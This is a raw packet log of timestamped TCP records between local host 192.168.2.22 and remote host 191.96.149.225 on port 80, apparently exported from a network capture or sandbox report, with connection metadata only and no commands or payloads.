Jan 13, 2021 20:42:45.585957050 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585973978 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.585978031 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.585983038 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.585989952 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586007118 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586021900 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586036921 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586036921 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586055040 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586055994 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586072922 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586075068 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586091995 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586106062 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586108923 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586126089 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586139917 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586142063 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586158037 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586159945 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586174011 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586189032 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586199045 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586205959 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586222887 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586225033 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586242914 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586256981 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586258888 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586273909 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586289883 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586291075 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586307049 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586323023 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586323023 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586339951 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586355925 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586359024 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.586400032 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.586412907 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.588144064 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.751535892 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.751591921 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.751610994 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.751630068 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.751652002 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.751672983 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.751693010 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.751713991 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.751840115 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.751883030 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754101992 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754137039 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754158020 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754177094 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754196882 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754220963 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754245043 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754261971 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754281044 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754288912 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754302979 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754307032 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754311085 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754314899 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754327059 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754348040 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754349947 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754369020 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754378080 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754395008 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754406929 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754420042 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754436016 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754441977 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754465103 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754465103 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754487991 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754499912 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754508972 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754523993 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754529953 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754550934 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754554033 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754574060 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754585028 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754597902 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754615068 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754618883 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754641056 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754643917 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754662037 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754672050 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754683971 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754700899 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754705906 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754728079 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754728079 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754750967 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754751921 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754776001 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754780054 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754796982 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754806995 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754818916 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754838943 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754841089 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754863024 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754863977 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754884958 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754894018 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754906893 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754926920 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754930973 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754952908 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754956007 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.754977942 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.754978895 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.755002975 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.755033016 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.756750107 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.917973042 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.918035030 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.918071985 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.918112993 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.918165922 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.918226004 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.918267965 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.918279886 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.918315887 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.918325901 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.918334961 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.918345928 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.918407917 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.920803070 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.920881033 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.920907974 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.920941114 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.920948982 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.920998096 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.920999050 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.921056986 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.921065092 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.921082973 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.921092033 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.921116114 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.921173096 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.922564983 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.922635078 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.922641039 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.922688961 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.922691107 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.922746897 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.922760010 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.922816038 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.922817945 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.922872066 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.922878981 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.922923088 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.922928095 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.922980070 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.922985077 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923037052 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923039913 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923094988 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923098087 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923150063 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923154116 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923207045 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923219919 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923279047 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923281908 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923335075 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923336029 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923384905 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923394918 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923451900 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923453093 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923508883 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923512936 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923567057 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923578024 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923613071 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923626900 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923651934 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923660040 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923686028 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923700094 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923717976 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923737049 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923753023 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923768044 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923788071 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923795938 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923820019 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923835993 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923854113 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923866987 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923887968 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923918009 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923926115 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923944950 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923962116 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.923974991 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.923994064 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.924006939 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.924027920 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.924031019 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.924061060 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.924079895 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.924092054 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.924103975 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.924125910 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:45.924137115 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.924165964 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:45.925369978 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084291935 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084355116 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084376097 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084398031 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084398985 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084436893 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084439993 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084475994 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084479094 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084516048 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084517956 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084564924 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084564924 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084608078 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084606886 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084645987 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084650993 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084685087 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084690094 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084722996 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084728003 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084759951 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084764004 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084798098 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084809065 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084836006 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084841967 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084877014 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084882975 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084925890 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.084925890 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.084969044 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.087073088 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087130070 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087145090 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.087167025 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087172985 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.087214947 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087256908 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087292910 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087294102 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.087299109 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.087362051 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087376118 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.087404966 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087425947 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.087440968 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087444067 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.087477922 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.087479115 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087517977 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.087517977 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087558031 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.087570906 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.087589025 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.089997053 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090053082 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090068102 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090090990 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090097904 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090131044 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090138912 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090183020 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090186119 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090219975 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090233088 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090253115 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090259075 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090296984 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090296984 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090333939 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090342045 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090373039 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090389967 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090430975 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090498924 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090539932 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090545893 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090581894 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090584993 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090622902 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090670109 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090696096 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090709925 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090712070 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090750933 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090753078 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090787888 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090789080 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090826988 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090828896 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090862989 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090864897 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090902090 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090913057 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090929985 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.090939999 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.090986013 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091001034 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091034889 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091037989 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091073036 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091097116 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091110945 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091113091 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091152906 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091155052 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091190100 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091195107 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091228962 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091232061 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091267109 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091295958 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091314077 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091315031 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091356993 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091381073 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091396093 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091396093 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091433048 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091434956 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091473103 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091474056 CET	80	49167	191.96.149.225	192.168.2.22
